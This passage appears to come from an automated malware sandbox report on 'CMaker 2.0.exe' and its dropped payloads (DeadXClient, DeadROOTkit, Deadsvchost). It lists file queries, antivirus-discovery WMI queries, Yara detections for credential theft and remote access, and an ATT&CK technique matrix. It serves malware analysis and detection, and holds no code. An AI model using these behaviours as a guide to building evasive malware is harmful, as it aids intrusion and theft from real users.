                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\certifi\cacert.pem VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeQueries volume information: C:\Users\Public\DeadXClient.exe VolumeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeQueries volume information: C:\Users\Public\DeadROOTkit.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                        Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                        Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEB480 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00007FF6FABEB480
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC05B00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,2_2_00007FF6FAC05B00
                        Source: C:\Users\user\AppData\Local\Temp\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: DeadXClient.exe, 00000006.00000002.3500000088.000000001BE30000.00000004.00000020.00020000.00000000.sdmp, DeadXClient.exe, 00000006.00000002.3500000088.000000001BE6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: svchost.exe, 0000001E.00000003.2486655004.0000022E67D5A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2487062721.0000022E67D5A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: Yara match | File source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: DeadXClient.exe PID: 6684, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\Public\DeadXClient.exe, type: DROPPED

                        Remote Access Functionality

                        Source: Yara match | File source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: Yara match | File source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: DeadXClient.exe PID: 6684, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\Public\DeadXClient.exe, type: DROPPED
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Credential API Hooking | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 121 Native API | 11 Scheduled Task/Job | 612 Process Injection | 111 Deobfuscate/Decode Files or Information | 1 Input Capture | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 22 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 123 Command and Scripting Interpreter | 21 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 21 Obfuscated Files or Information | Security Account Manager | 34 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts11
                        Scheduled Task/Job
                        Login Hook21
                        Registry Run Keys / Startup Folder
                        311
                        Software Packing
                        NTDS561
                        Security Software Discovery
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        PowerShell
                        Network Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets2
                        Process Discovery
                        SSHKeylogging13
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion
                        Cached Domain Credentials151
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                        Rootkit
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
                        Masquerading
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Modify Registry
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                        Virtualization/Sandbox Evasion
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
                        Process Injection
